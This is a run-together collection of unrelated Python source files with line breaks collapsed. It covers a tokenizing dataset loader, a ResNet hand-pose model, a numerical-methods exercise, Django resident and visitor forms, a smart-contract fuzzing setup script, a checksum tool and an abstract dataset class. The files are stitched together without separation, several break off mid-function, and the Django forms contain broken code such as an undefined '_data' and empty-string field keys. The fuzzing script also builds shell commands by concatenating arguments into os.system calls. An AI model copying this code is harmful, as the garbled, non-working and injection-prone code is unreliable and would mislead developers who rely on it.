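# Dataset-loading utilities: get_dataset() fills in any missing preprocessing
# arguments (optionally via an interactive nlp2 Panel) and builds a LoadDataset,
# which tokenizes the input file with a HuggingFace tokenizer, runs the model's
# preprocessing_data / get_feature_from_data hooks, and can pickle the resulting
# feature list to a ".cache" file next to the input for faster reloads.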
from tqdm import tqdm from transformers import AutoTokenizer, BertTokenizer def check_type_for_dataloader(data_item): if (isinstance(data_item, list) and not isinstance(data_item[-1], str) and check_type_for_dataloader( data_item[-1])) or \ isinstance(data_item, str) or \ isinstance(data_item, numpy.ndarray) or \ isinstance(data_item, int): return True else: return False def get_dataset(file_path, model_class, parameter): panel = nlp2.Panel() all_arg = nlp2.function_get_all_arg_with_value(model_class.preprocessing_data) if parameter.get('panel'): for missarg in nlp2.function_check_missing_arg(model_class.preprocessing_data, parameter): panel.add_element(k=missarg, v=all_arg[missarg], msg=missarg, default=all_arg[missarg]) filled_arg = panel.get_result_dict() parameter.update(filled_arg) ds = LoadDataset(fpath=file_path, pretrained_config=parameter.get('config'), get_data_from_file=model_class.get_data_from_file, preprocessing_data=model_class.preprocessing_data, cache=parameter.get('cache'), input_arg=parameter) return ds class LoadDataset(data.Dataset): def __init__(self, fpath, pretrained_config, get_data_from_file, preprocessing_data, cache=False, input_arg={}): sample = [] if 'albert_chinese' in pretrained_config: tokenizer = BertTokenizer.from_pretrained(pretrained_config) else: tokenizer = AutoTokenizer.from_pretrained(pretrained_config) cache_path = fpath + "_" + pretrained_config.replace("/", "_") + ".cache" print(cache_path) if os.path.isfile(cache_path) and cache: with open(cache_path, "rb") as cf: outdata = pickle.load(cf) sample = outdata['sample'] task_dict = outdata['task'] else: task_dict = {} total_data = 0 for i in tqdm(get_data_from_file(fpath), desc='load dataset'): tasks, task, input_text, target, *other = i task_dict.update(tasks) for get_feature_from_data, feature_param in preprocessing_data(i, tokenizer, **input_arg): for feature in get_feature_from_data(**feature_param): feature = {k: v for k, v in feature.items() if check_type_for_dataloader(v)} sample.append(feature) total_data += 1 print("Processed " + str(total_data) + " data.") print('Cache', cache) if cache: with open(cache_path, 'wb') as cf: outdata = {'sample': sample, 'task': task_dict} pickle.dump(outdata, cf) self.sample = sample self.task = task_dict print('finished loading') def increase_with_sampling(self, total): inc_samp = [choice(self.sample) for _ in range(total - len(self.sample))] self.sample.extend(inc_samp) def __len__(self): return len(self.sample) def __getitem__(self, idx): self.sample[idx].update((k, np.asarray(v)) for k, v in self.sample[idx].items() if k != 'task') return self.sample[idx] ''' This is a project developed by MeGaCrazy (github: MeGaCrazy), who opend the code on github. We noted where the source code came from, u sed it, changed it to suit our needs, and implemented our software. 
''' # author = __xiaofeng__ # date = 2019/11/1 # Some Constant Values used Over all sources codes PORT = int(5555) HOST = 'localhost' REGISTER = '1' SEARCH = '2' DOWNLOAD = '3' LIST_ALL = '4' EXIT = '7' LIST_LOCAL_FILES = '5' RECONNECT = '6' TIME_GAP = int(30) DETECT_TIME = int(3) REGISTER_CLIENT = "clientRegister" SERVER_LOGNAME = "server.log" CLIENT_LOGNAME = "client.log" import os import torch import torch.nn as nn from torchvision import models from torchvision.models.utils import load_state_dict_from_url from torchvision.models.resnet import Bottleneck, model_urls import copy import torch import torch.nn as nn from torchvision import models from torch.nn.parameter import Parameter device = torch.device("cuda" if torch.cuda.is_available() else "cpu") RHD2Bighand_skeidx = [0, 4, 8, 12, 16, 20, 3, 2, 1, 7, 6, 5, 11, 10, 9, 15, 14, 13, 19, 18, 17] # The GraphConv is designed based on RHD index for hand class GraphConv(nn.Module): def __init__(self, in_features, out_features): super(GraphConv, self).__init__() self.fc = nn.Linear(in_features=in_features, out_features=out_features) self.activation = nn.ReLU(inplace=True) self.I = torch.eye(21).float().to(device).unsqueeze(0) for i in range(5): start = i * 4 + 1 self.I[0, 0, start] = 1 self.I[0, start, 0] = 1 for j in range(3): self.I[0, start + j, start + 1 + j] = 1 self.I[0, start + 1 + j, start + j] = 1 self.I = Parameter(self.I, requires_grad=True) def laplacian(self, A_hat): D_hat = torch.sum(A_hat, 1, keepdim=True) + 1e-5 L = 1 / D_hat * A_hat return L def forward(self, x): batch = x.size(0) A_hat = self.laplacian(self.I) A_hat = A_hat.repeat(batch, 1, 1) out = self.fc(torch.matmul(A_hat, x)) return out class GraphConvBlock(nn.Module): def __init__(self, layers): super(GraphConvBlock, self).__init__() self.gcn_0 = GraphConv(layers[0], layers[1]) self.gcn_1 = GraphConv(layers[1], layers[2]) self.relu = nn.ReLU(inplace=True) def forward(self, x): # x = self.relu(self.gcn_0(x)) # x = self.relu(self.gcn_1(x)) x = self.gcn_0(x) x = self.gcn_1(x) return x class ResNet(models.ResNet): """ResNets without fully connected layer""" def __init__(self, *args, **kwargs): super(ResNet, self).__init__(*args, **kwargs) self._out_features = self.fc.in_features def forward(self, x): x = self.conv1(x) x = self.bn1(x) x = self.relu(x) x = self.maxpool(x) x = self.layer1(x) x = self.layer2(x) x = self.layer3(x) x = self.layer4(x) return x @property def out_features(self) -> int: """The dimension of output features""" return self._out_features def copy_head(self) -> nn.Module: """Copy the origin fully connected layer""" return copy.deepcopy(self.fc) def _resnet(arch, block, layers, pretrained, progress, **kwargs): model = ResNet(block, layers, **kwargs) if pretrained: model_dict = model.state_dict() pretrained_dict = load_state_dict_from_url(model_urls[arch], progress=progress) # remove keys from pretrained dict that doesn't appear in model dict pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict} model.load_state_dict(pretrained_dict, strict=False) return model def resnet101(pretrained=False, progress=True, **kwargs): r"""ResNet-101 model from `"Deep Residual Learning for Image Recognition" `_ Args: pretrained (bool): If True, returns a model pre-trained on ImageNet progress (bool): If True, displays a progress bar of the download to stderr """ return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress, **kwargs) class Upsampling(nn.Sequential): """ 3-layers deconvolution used in `Simple Baseline `_. 
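    Each stage is a stride-2 ConvTranspose2d (kernel 4 uses padding 1, kernel 3
    uses padding 1 with output_padding 1, kernel 2 uses padding 0) followed by
    BatchNorm2d and ReLU, so every stage exactly doubles the spatial resolution.
    When `multi_channel` is given, a 1x1 stride-2 Conv2d first maps the input to
    `in_channel` channels.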
""" def __init__(self, multi_channel=None, in_channel=2048, hidden_dims=(256, 256, 256), kernel_sizes=(4, 4, 4), bias=False): assert len(hidden_dims) == len(kernel_sizes), \ 'ERROR: len(hidden_dims) is different len(kernel_sizes)' layers = [] if multi_channel != None: layers.append(nn.Sequential(*[ nn.Conv2d(multi_channel, in_channel, kernel_size=1, stride=2, padding=0, dilation=1, bias=True), nn.BatchNorm2d(in_channel), nn.ReLU(inplace=True)])) for hidden_dim, kernel_size in zip(hidden_dims, kernel_sizes): if kernel_size == 4: padding = 1 output_padding = 0 elif kernel_size == 3: padding = 1 output_padding = 1 elif kernel_size == 2: padding = 0 output_padding = 0 else: raise NotImplementedError("kernel_size is {}".format(kernel_size)) layers.append( nn.ConvTranspose2d( in_channels=in_channel, out_channels=hidden_dim, kernel_size=kernel_size, stride=2, padding=padding, output_padding=output_padding, bias=bias)) layers.append(nn.BatchNorm2d(hidden_dim)) layers.append(nn.ReLU(inplace=True)) in_channel = hidden_dim super(Upsampling, self).__init__(*layers) # init following Simple Baseline for name, m in self.named_modules(): if isinstance(m, nn.ConvTranspose2d): nn.init.normal_(m.weight, std=0.001) if bias: nn.init.constant_(m.bias, 0) elif isinstance(m, nn.BatchNorm2d): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) class Decoder_head(nn.Module): """ decoder head for uv_heatmap and 2.5d heatmap 3 ConvTranspose2d in Unsampling default head has conv bn relu and conv """ def __init__(self, out_features=2048, num_head_layers=2, feature_dim=256, num_keypoints=21, is_drop=False, multi_channel=None): super(Decoder_head, self).__init__() self.upsampling = Upsampling(multi_channel, out_features) self.head = self._make_head(num_head_layers, feature_dim, num_keypoints, is_drop) @staticmethod def _make_head(num_layers, channel_dim, num_keypoints, is_drop=False, droprate=0.2): layers = [] for i in range(num_layers - 1): layers.extend([ nn.Conv2d(channel_dim, channel_dim, 3, 1, 1), nn.BatchNorm2d(channel_dim), nn.ReLU(), ]) if is_drop: layers.append(nn.Dropout2d(droprate)) layers.append( nn.Conv2d( in_channels=channel_dim, out_channels=num_keypoints, kernel_size=1, stride=1, padding=0 ) ) layers = nn.Sequential(*layers) for m in layers.modules(): if isinstance(m, nn.Conv2d): nn.init.normal_(m.weight, std=0.001) nn.init.constant_(m.bias, 0) return layers def forward(self, x): x = self.upsampling(x) x = self.head(x) return x class Decoder_mlp(nn.Module): def __init__(self, n_input = 2048, n_latent=128, n_keypoint=21): super(Decoder_mlp, self).__init__() self.n_keypoint = n_keypoint self.avgpool = nn.AdaptiveAvgPool2d((1, 1)) self.l=nn.Sequential(nn.Linear(n_input,n_latent),nn.ReLU(), nn.Linear(n_latent,n_latent),nn.ReLU(), nn.Linear(n_latent,n_latent),nn.ReLU(), nn.Linear(n_latent, n_keypoint*2),) def forward(self, x): x = self.avgpool(x) x = torch.flatten(x, 1) x = self.l(x).view(x.size(0),self.n_keypoint,2) return x class PoseResNet(nn.Module): def __init__(self, backbone, decoder, kinematic): super(PoseResNet, self).__init__() self.backbone = backbone self.decoder = decoder self.gcnn = kinematic def forward(self, x): x = self.backbone(x) x = self.decoder(x) x = self.gcnn(x) return x class KinematicLayer(nn.Module): def __init__(self, layers = [64*64, 64*64, 64*64], output_layer = 64*64): super(KinematicLayer, self).__init__() self.block_0 = GraphConvBlock(layers) self.block_1 = GraphConvBlock(layers) self.block_2 = GraphConv(layers[-1], output_layer) def forward(self, x): bs = x.size(0) x = 
x.view(bs, 21, -1) x = self.block_0(x) + x x = self.block_1(x) + x x = self.block_2(x).view(bs,21,64,64) # ! this should be RHD index # x = x[:,RHD2Bighand_skeidx,:] # ! convert the prediction to target index return x def pose_resnet101_heatmap(pretrained = True, num_keypoints = 21, num_head_layers = 1, is_drop=False): backbone = resnet101(pretrained=pretrained) decoder = Decoder_head(2048, num_head_layers, 256, num_keypoints, is_drop=is_drop) kinematic = KinematicLayer() model = PoseResNet(backbone, decoder, kinematic) return model if __name__ == '__main__': model = pose_resnet101_heatmap().cuda() optimizer = torch.optim.Adam(model.parameters()) for i in range(1000): print(i) x = torch.randn([32, 3, 256, 256]).cuda() out = model(x) loss = torch.mean(out) optimizer.zero_grad() loss.backward() optimizer.step()class Solution(object): def generateAbbreviations(self, word): """ :type word: str :rtype: List[str] """ def dfs(w, start, res): res.append(w) for i in xrange(start, len(w)): for l in xrange(1, len(w) - i + 1): lstr = str(l) llen = len(lstr) dfs(w[:i] + lstr + w[i+l:], i + 2 + llen - 1, res) res = [] dfs(word, 0, res) return res1-10 # Talon voice commands for interacting with Postbox mail # from talon.voice import Key, Context ctx = Context("postbox", bundle="com.postbox-inc.postbox") ctx.keymap( { "new mail": Key("cmd-n"), "send mail": Key("cmd-shift-d"), "reply mail": Key("cmd-r"), "reply all": Key("shift-cmd-r"), "forward mail": Key("cmd-l"), "mark unread": Key("m"), "mark read": Key("r"), "star": Key("s"), "delete mail": Key("backspace"), "archive mail": Key("a"), "next mail": Key("f"), "previous mail": Key("b"), "next unread": Key("n"), "previous unread": Key("p"), "top list": Key("fn-left"), "bottom list": Key("fn-right"), } ) exercicio1.py # Exercicio 1 - Teste # MAP3122 - Métodos Numéricos e Aplicações # Resolvido por: # NUSP - 11257522 # S.F NUSP - 11257539 import numpy as np import matplotlib.pyplot as plt import matplotlib.image as mpimg # Valores globais para Runge-Kutta 4 A = np.array([[-2,-1,-1,-2],[1,-2,2,-1],[-1,-2,-2,-1],[2,-1,1,-2]]) # Funcoes Runge Kutta def funcao_kutta4(t,x): return np.dot(A,x) def funcao_exata_kutta4(t): funcao = [] funcao_1 = np.e**(-t)*np.sin(t) + np.e**(-3*t)*np.cos(3*t) funcao_2 = np.e**(-t)*np.cos(t) + np.e**(-3*t)*np.sin(3*t) funcao_3 = -np.e**(-t)*np.sin(t) + np.e**(-3*t)*np.cos(3*t) funcao_4 = -np.e**(-t)*np.cos(t) + np.e**(-3*t)*np.sin(3*t) funcao.extend([funcao_1,funcao_2,funcao_3,funcao_4]) return(funcao) # Valores globais para euler t = np.linspace(1.1, 3.0, 5000) x = t**2 + 1/(1-t) # Funcoes Euler def funcao_euler(t,x): return 2*t+(x-t**2)**2 def funcao_exata_euler(t): return t**2 + 1/(1-t) # Metodo de Runge Kutta 4 # retorna somatoria CpKp def funcao_phi(t,x,h): # coeficientes k1 = funcao_kutta4(t,x) k2 = funcao_kutta4(t+h/2,x+h/2*k1) k3 = funcao_kutta4(t+h/2,x+h/2*k2) k4 = funcao_kutta4(t+h,x+h*k3) k_total = (k1)/6+(k2)/3+(k3)/3+(k4)/6 return(k_total) # Realiza o algoritmo de Runge Kutta 4 def runge_kutta4(t_inicial, t_final, x_inicial, h): solucao = [] solucao = np.insert(solucao, len(solucao), t_inicial) solucao = np.insert(solucao, len(solucao), x_inicial) tn = t_inicial xn = x_inicial while tn < t_final: v_aux = [] xn1 = xn + h*funcao_phi(tn,xn,h) xn = xn1 v_aux.append(tn) v_aux.extend(xn) solucao = np.vstack((solucao, v_aux)) tn += h return(solucao) # Funcao que devolve E1,n(t) := max 1 guarda_valor): guarda_valor = dif_abs guarda_j = j j = guarda_j # Pega a funcao com maior erro for i in range (len(solucao)): t = solucao[i,0] 
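        # For each stored time step, take the absolute error of component j
        # (the component with the largest deviation, selected above) against
        # the exact solution funcao_exata_kutta4(t).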
dif_abs = abs(solucao[i,j] - funcao_exata_kutta4(t)[j]) if(i == 0): erro.extend([t, dif_abs]) else: erro = np.vstack((erro, [t,dif_abs])) return(erro) # Devolve a lista de erros com n igual a 20,40,80,160,320 e 640 def lista_erro_rk4(): n = [20,40,80,160,320,640] h = [2/20,2/40,2/80,2/160,2/320, 2/640] erro_1 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[0])) erro_2 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[1])) erro_3 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[2])) erro_4 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[3])) erro_5 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[4])) erro_6 = erro_kutta4(runge_kutta4(0, 2, [1,1,1,-1], h[5])) erro = [erro_1, erro_2, erro_3, erro_4, erro_5, erro_6] return(erro) # Funcao que plota o erro de Runge Kutta e tambem salva def plota_erro(): erro = lista_erro_rk4() n = [20,40,80,160,320,640] tamanho = len(erro)-1 for i in range(tamanho): funcao = erro[i] fig, ax = plt.subplots() ax.plot(funcao[:,0], funcao[:,1], 'tab:purple') ax.set_title("Erro com n igual a " + str(n[i])) plt.savefig("solucao_" +"rungekutta4_" + str(i) + ".jpg",bbox_inches='tight') print("Imagem Salva!") plt.show() # Funcao que calcula o R def calcula_R_rk4(): erro = lista_erro_rk4() for i in range(5): R_i = (np.amax(erro[i], axis=1)[1])/(np.amax(erro[i+1], axis=1)[1]) print(R_i) # Metodo de Euler Implicito def euler_implicito(t_inicial, t_final, x_inicial, h): # faz a matriz solucao solucao = [] solucao = np.insert(solucao, len(solucao), t_inicial) solucao = np.insert(solucao, len(solucao), x_inicial) # valores iniciais tn = t_inicial xn = x_inicial # interacao metodo de euler while tn < t_final: tn += h xn1 = xn + h*funcao_euler(tn, xn+h) xn = xn1 solucao = np.vstack([solucao,[tn, xn]]) return(solucao) # Funcao que calcula o erro E2(t) := |x*-x|*100 # Obs: o *100 é utilizado para ver alguma diferença, # já que o metodo é bastante eficiente def erro_euler(solucao): erro = [] for i in range (len(solucao)): t = solucao[i,0] dif_abs = abs(solucao[i,1] - funcao_exata_euler(t))*100 if(i == 0): erro.extend([t, dif_abs]) else: erro = np.vstack((erro, [t,dif_abs])) return(erro) # Plota o grafico da solucao esperada, resolvida e do erro def plota_grafico(solucao): fig, (ax1,ax2, ax3) = plt.subplots(1,3,sharex='col', sharey='row') fig.suptitle('Comparacao do Esperado e do resolvido por Euler') ax1.set_title("Esperado") ax1.plot(t,x) ax2.plot(solucao[:, 0], solucao[:, 1], 'tab:orange') ax2.set_title("Resolvido por Euler") erro = erro_euler(solucao) ax3.plot(erro[:,0], erro[:,1], 'tab:green') ax3.set_title("Erro") plt.savefig("solucao_" +"euler_implicito" + ".jpg",bbox_inches='tight') print("Imagem Salva!") plt.show() # 4 plota_erro() calcula_R_rk4() # euler h = (3.0-1.1)/5000 solucao_euler = euler_implicito(1.1, 3.0, -8.79, h) plota_grafico(solucao_euler) ## import skeleton process from PhysicsTools.PatAlgos.patTemplate_cfg import * ## ------------------------------------------------------ # NOTE: you can use a bunch of core tools of PAT to # taylor your PAT configuration; for a few examples # uncomment the lines below ## ------------------------------------------------------ from PhysicsTools.PatAlgos.tools.coreTools import * ## remove MC matching from the default sequence # removeMCMatching(process, ['Muons']) # runOnData(process) ## remove certain objects from the default sequence # removeAllPATObjectsBut(process, ['Muons']) # removeSpecificPATObjects(process, ['Electrons', 'Muons', 'Taus']) process.load('EgammaAnalysis.ElectronTools.electronIdMVAProducer_cfi') process.mvaID = 
cms.Sequence( process.mvaTrigV0 + process.mvaTrigNoIPV0 + process.mvaNonTrigV0 ) #Electron ID process.patElectrons.electronIDSources = cms.PSet( #MVA mvaTrigV0 = cms.InputTag("mvaTrigV0"), mvaNonTrigV0 = cms.InputTag("mvaNonTrigV0"), mvaTrigNoIPV0 = cms.InputTag("mvaTrigNoIPV0"), ) #add pat conversions process.patConversions = cms.EDProducer("PATConversionProducer", # input collection #electronSource = cms.InputTag("gsfElectrons"), electronSource = cms.InputTag("cleanPatElectrons") # this should be your last selected electron collection name since currently index is used to match with electron later. We can fix this using reference pointer. , ) ## let it run process.p = cms.Path( process.mvaID + process.patDefaultSequence+ process.patConversions ) process.out.outputCommands +=[ # 'keep *_patConversions*_*_*' ] ## ------------------------------------------------------ # In addition you usually want to change the following # parameters: ## ------------------------------------------------------ # # process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions) # ## process.source.fileNames = [ ## '/store/mc/Summer12_DR53X/DYJetsToLL_M-50_TuneZ2Star_8TeV-madgraph-tarball/AODSIM/PU_S10_START53_V7A-v1/0001/FE4B9392-D8D3-E111-8789-0025B3E05D8C.root' ] ## (e.g. 'file:AOD.root') # ## # process.maxEvents.input = ... ## (e.g. -1 to run on all events) # ## # process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py) # ## # process.out.fileName = ... ## (e.g. 'myTuple.root') # ## # process.options.wantSummary = True ## (to suppress the long output at the end of the job) Setti7/itaipucontas/forms.py from django import forms from django.contrib.auth import ( password_validation, ) from django.contrib.sites.shortcuts import get_current_site from django.core.mail import send_mail from django.forms import widgets from django.template import loader from django.utils.encoding import force_bytes from django.utils.http import urlsafe_base64_encode from django.utils.translation import gettext_lazy as _ from django.contrib.auth.forms import UserCreationForm from contas.models import Residente, Visitante, Chacara from itaipu.settings import REGISTRATION_EMAIL class AssociarResidenteForm(forms.Form): token = forms.CharField(max_length=8) new_password1 = forms.CharField( label=_("New password"), widget=forms.PasswordInput, strip=False, help_text=password_validation.password_validators_help_text_html(), ) new_password2 = forms.CharField( label=_("New password confirmation"), strip=False, widget=forms.PasswordInput, ) email = forms.EmailField(max_length=254) field_order = ['token', 'email', 'new_password1', 'new_password2'] error_messages = { 'password_mismatch': _("The two password fields didn't match."), 'invalid_token': 'Esse token é inválido.', 'email_not_unique': "Esse email já está em uso.", 'account_already_activated': 'Esse token já foi utilizado.
    Caso tenha esquecido a senha, vá para a página de ' 'login e clique em "Esqueceu a senha?".', } email_template_name = 'contas/associar-residente-email.html' subject = 'Parque Itaipu - Ativação da Conta' def __init__(self, request, *args, **kwargs): self.request = request super().__init__(*args, **kwargs) def clean_email(self): email = self.cleaned_data['email'] if Residente.objects.filter(email=email).exists(): raise forms.ValidationError( self.error_messages['email_not_unique'], code='email_not_unique', ) return email def clean(self): cleaned_data = super().clean() # Token validation token = cleaned_data.get('token') qs = Residente.objects.filter(token=token) if not qs.exists(): error = forms.ValidationError( self.error_messages['invalid_token'], code='invalid_token', ) self.add_error('token', error) self.user = None else: self.user = qs[0] # Active user validation if self.user.is_active: error = forms.ValidationError( self.error_messages['account_already_activated'], code='account_already_activated', ) self.add_error('token', error) # Password validation password1 = _data.get('') password2 = _data.get('') if password1 and password2: if password1 != password2: error = forms.ValidationError( self.error_messages['password_mismatch'], code='password_mismatch', ) self.add_error('new_password2', error) password_validation.validate_password(password2, self.user) return cleaned_data def save(self, commit=True): password = self.cleaned_data[""] self.user.set_password(password) self.user.email = self.cleaned_data['email'] if commit: self.user.save() current_site = get_current_site(self.request) context = { 'email': self.user.email, 'domain': current_site.domain, 'site_name': current_site.name, 'email_uidb64': urlsafe_base64_encode(force_bytes(self.user.email)).decode(), 'user': self.user, 'token_uidb64': urlsafe_base64_encode(force_bytes(self.cleaned_data['token'])).decode(), 'protocol': 'https' if self.request.is_secure() else 'http', } body = loader.render_to_string(self.email_template_name, context) send_mail( subject=self.subject, message=None, html_message=body, from_email=REGISTRATION_EMAIL, recipient_list=[self.user.email] ) return self.user class EditarVisitanteForm(forms.ModelForm): # Editáveis data = forms.DateField(label='Data', input_formats=['%d/%m/%Y', '%Y-%m-%d'], widget=widgets.DateInput(format='%d/%m/%Y')) # Hidden form_id = forms.IntegerField(min_value=0, max_value=999999, widget=forms.HiddenInput) nomeres = forms.CharField(max_length=50, required=False) foto = forms.ImageField(required=False) class Meta: model = Visitante fields = ['nome', 'data', 'form_id', 'nomeres', 'foto'] def __init__(self, nomeres, *args, **kwargs): self.nomeres = nomeres super().__init__(*args, **kwargs) def save(self, commit=True): v = super().save(commit=False) nome = self.cleaned_data.get('nome') data = self.cleaned_data.get('data') foto = self.cleaned_data.get('foto') pk = self.cleaned_data.get('form_id') nomeres = self.nomeres v = Visitante.objects.get(pk=pk) if commit: v.nome = nome v.foto = foto v.data = data v.agendado = True v.nomeres = nomeres v.save() return v class NovoVisitanteForm(forms.ModelForm): # Editáveis data = forms.DateField(label='Data', input_formats=['%d/%m/%Y', '%Y-%m-%d'], widget=widgets.DateInput(format='%d/%m/%Y')) class Meta: model = Visitante fields = ['nome', 'data'] def __init__(self, user, *args, **kwargs): self.chacara = user.chacara self.nomeres = user.nome super().__init__(*args, **kwargs) def save(self, commit=True): v = super().save(commit=False) nome = 
self.cleaned_data.get('nome') data = self.cleaned_data.get('data') chacara = self.chacara nomeres = self.nomeres if commit: v = Visitante.objects.create(nome=nome, chacara=chacara, nomeres=nomeres, data=data, agendado=True) v.save() return v class EditarTelefoneForm(forms.ModelForm): class Meta: model = Chacara fields = ['telefone'] class EditarResidenteForm(forms.ModelForm): # Hidden form_id = forms.IntegerField(min_value=0, max_value=999999, widget=forms.HiddenInput) class Meta: model = Residente fields = ['nome', 'status', 'token', 'email', 'form_id'] class NovoResidenteForm(UserCreationForm): STATUS_CHOICES = ( ('P', 'Proprietário'), ('C', 'Caseiro'), ) status = forms.ChoiceField(choices=STATUS_CHOICES) class Meta: model = Residente fields = ['nome', 'status', 'email', 'password1', ''] def __init__(self, chac_id, status, *args, **kwargs): super().__init__(*args, **kwargs) self.chac_id = chac_id self.status = status if self._meta.model.USERNAME_FIELD in self.fields: self.fields[self._meta.model.USERNAME_FIELD].widget.attrs.update({'autofocus': True}) def clean_status(self): self.error_messages['caseiro_not_authorized'] = 'Caseiros só podem criar outros caseiros.' status = self.cleaned_data.get("status") if self.status == 'C' and status != 'C': raise forms.ValidationError( self.error_messages['caseiro_not_authorized'], code='caseiro_not_authorized', ) return status def save(self, commit=True): user = super().save(commit=False) user.set_password(self.cleaned_data[""]) user.chacara = self.chac_id user.is_active = True if commit: user.save() return usercouchdb/design_document.py from document import Document class DesignDocument(Document): def __init__(self, database, doc_id, rev): super(DesignDocument, self).__init__(database, '_design/{0}'.format(doc_id), rev) # -*- coding: utf-8 -*- class CheckRepo: def check_repository(self): # we must check the repository... 
pass class VersionManager: def __init__(self, check_repo=None): self.check_repo = check_repo def check_file(self, requirements): if not requirements: return 'this project has no package list' if self.check_repo: self.check_repo.check_repository() # -*- coding: utf-8 -*- # @Time : 2020/10/08 21:41:48 # @Author : RegiusQuant <> # @Project : Regius-AI # @File : metrics.py # @Description: 评估指标 from sklearn.metrics import ( mean_squared_error, mean_absolute_error, r2_score ) def calc_regression_metrics(y_true, y_pred): return { "RMSE": mean_squared_error(y_true, y_pred) ** 0.5, "MAE": mean_absolute_error(y_true, y_pred), "R2": r2_score(y_true, y_pred) } sunbeam891/Smart_contract_fuzzing #script0.3.3 # Format : python3 Test.py import os import sys #files = os.listdir(path) word = "contract" delim = " " words= [] path ="" commands = open ("Confuzzius_commands.sh","w") commands.write ("#!/bin/bash" + " \n") commands.write("cd /root/" + " \n") contractname = sys.argv[1] Contractfile = sys.argv[2] #add if else for different fuzzers for a variable that contains the directory containing the crowdsale folder #Remove build files for root, dirs, files in os.walk("/go/src/ilf/example/crowdsale"): print(files) for directory in dirs: if directory == "build": print(os.path.join(root, directory)) os.system ("rm -r "+ os.path.join(root, directory)) # Edit deploy js file with contract details for root, dirs, files in os.walk("/go/src/ilf/example/crowdsale"): for f in files: if f == "2_deploy_contracts.js": a_file= open(os.path.join(root, f),"r",encoding="utf-8") listoflines=a_file.readlines() print(listoflines) for i in range(0,len(listoflines)): #if line.find("deployer.deploy") != -1: if "var crowdsale " in listoflines[i]: listoflines[i]='var crowdsale = artifacts.require("{contractsname}");\n'.format(contractsname=contractname) print(listoflines) print(listoflines) b_file=open(os.path.join(root, f),"w",encoding="utf-8") b_file.writelines(listoflines) b_file.close() a_file.close() # Copy new contract and delete old contract for root2, dirs2, files2 in os.walk("/go/src/ilf/example/crowdsale/contracts"): for f in files2: if f == "Migrations.sol": path = root2 else: os.system ("rm " + os.path.join(root2, f)) for root3, dirs3, files3 in os.walk("/go/src/ilf/dataset"): for f in files3: if f == Contractfile: os.system ("cp " + os.path.join(root3, f) + " " + path)import hashlib import argparse def hashfile(afile, hasher, blocksize=65536): buf = afile.read(blocksize) while len(buf) > 0: hasher.update(buf) buf = afile.read(blocksize) return hasher.hexdigest() def main(): parser = argparse.ArgumentParser( prog = 'chksum', description = "Using SHA256 to calculate a checksum for one or more files", formatter_class=argparse.RawTextHelpFormatter ) parser.add_argument('fnames', metavar='fname', type=str, nargs='+', help="One or more filenames to calculate the checksum for") args = parser.parse_args() for fname in args.fnames: print "%s: %s" %(fname, hashfile(open(fname, 'rb'), hashlib.sha256())[:16]) """File containing abstract base class for datasets.""" import abc from contextlib import contextmanager from copy import copy from types import SimpleNamespace from typing import Callable, Dict, List, Mapping, Optional, Sequence, Union import cytoolz as tz import numpy as np import pandas as pd import pyarrow as pa from datasets.arrow_dataset import DatasetInfoMixin from robustnessgym.core.tools import recmerge Example = Dict Batch = Dict[str, List] class AbstractDataset( abc.ABC, DatasetInfoMixin, ): """An abstract dataset 
class.""" all_columns: Optional[List[str]] visible_columns: Optional[List[str]] visible_rows: Optional[np.ndarray] _data: Union[Dict[str, List], pd.DataFrame, pa.Table] def __init__(self, *args, **kwargs): super(AbstractDataset, self).__init__(*args, **kwargs) def __repr__(self): return f"RG{self.__class__.__name__}" f"(num_rows: {self.num_rows})" def __len__(self): # If only a subset of rows are visible if self.visible_rows is not None: return len(self.visible_rows) # If there are columns, len of any column if self.column_names: return len(self._data[self.column_names[0]]) return 0 @property def column_names(self): """Column names in the dataset.""" return self.all_columns @property def columns(self): """Column names in the dataset.""" return self.column_names @property def num_rows(self): """Number of rows in the dataset.""" return len(self) @property def shape(self): """Shape of the dataset (num_rows, num_columns).""" return self.num_rows, len(self.columns) @classmethod def _assert_columns_all_equal_length(cls, batch: Batch): """Check that all columns have the same length so that the data is tabular.""" assert cls._columns_all_equal_length( batch ), "All columns must have equal length." @classmethod def _columns_all_equal_length(cls, batch: Batch): """Check that all columns have the same length so that the data is tabular.""" if len(set([len(v) for k, v in batch.items()])) == 1: return True return False def _check_columns_exist(self, columns: List[str]): """Check that every column in `columns` exists.""" for col in columns: assert col in self.all_columns, f"{col} is not a valid column." @abc.abstractmethod def _set_features(self): """Set the features of the dataset.""" raise NotImplementedError def _initialize_state(self): """Dataset state initialization.""" # Show all columns by default self.visible_columns = copy(self.all_columns) # Show all rows by default self.visible_rows = None # Set the features self._set_features() @abc.abstractmethod def add_column(self, column: str, values: List): """Add a column to the dataset.""" raise NotImplementedError def set_visible_rows(self, indices: Optional[Sequence]): """Set the visible rows in the dataset.""" if indices is None: self.visible_rows = None else: if len(indices): assert min(indices) >= 0 and max(indices) < len(self), ( f"Ensure min index {min(indices)} >= 0 and " f"max index {max(indices)} < {len(self)}." ) if self.visible_rows is not None: self.visible_rows = self.visible_rows[np.array(indices, dtype=int)] else: self.visible_rows = np.array(indices, dtype=int) def reset_visible_rows(self): """Reset to make all rows visible.""" self.visible_rows = None @contextmanager def format(self, columns: List[str] = None): """Context where only `columns` will be visible.""" # Get the current format current_format = self.get_format() if columns: # View only `columns` self.set_format(columns) else: # Use all columns self.set_format(self.column_names) try: yield finally: # Reset the format back self.set_format(current_format) def get_format(self) -> List[str]: """Get the dataset format.""" return self.visible_columns def set_format(self, columns: List[str]): """Set the dataset format. Only `columns` are visible after set_format is invoked. """ # Check that the columns exist self._check_columns_exist(columns) # Set visible columns self.visible_columns = columns def reset_format(self): """Reset the dataset format. All columns are visible. 
